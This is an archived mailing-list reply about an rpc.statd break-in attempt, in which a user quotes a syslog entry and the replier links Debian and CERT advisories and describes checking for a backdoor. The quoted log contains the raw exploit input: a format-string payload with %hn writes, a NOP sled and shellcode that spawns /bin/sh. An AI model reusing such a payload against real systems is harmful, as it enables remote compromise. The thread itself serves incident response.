[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: none

>>>>> "Russell" == Russell Speed <rfspeed@attcanada.ca> writes:

Russell> I am curious if the following is an example of a buffer overflow.  I

Yes. I have the same in my log.
See http://www.debian.org/security/2000/20000719a
and http://www.cert.org/advisories/CA-2000-17.html

Russell> noticed this in my syslog - and the following day had someone logged in
Russell> from an IP I'm not aware of.

Russell> I changed the passwords - and added an entry to the input chain to block
Russell> the IP, but am wondering what other things I should do? 

Russell> Should I remove /bin/sh for something less obvious as a general
Russell> protection from buffer overflows?

That would render unusable lots of shell scripts staring with #!/bin/sh.  

Russell> As you can see it's a lot of binary and then near the end is "/bin/sh".

Russell> Sep  9 21:27:43 gw /sbin/rpc.statd[336]: gethostbyname error for
Russell> ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Russell> Sep  9 21:27:43 gw
Russell> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^A
Russell> Í\200è\177ÿÿÿ

I'd like someone more knowledgable to comment on this if possible.
This log is somewhat different compared to one published by CERT,
where you can see a pretty backdoor installed in inetd.conf. In fact
after checking my system (not very thoroughly, just quick look on
setuids, passwd, shadow, inetd.conf, etc. looking for hidden
derectories (e.g. find / -name ".. *") I was unable to find any
intrusion and was thinking that the attempt wasn't successful, before
I got this mail.


Reply to: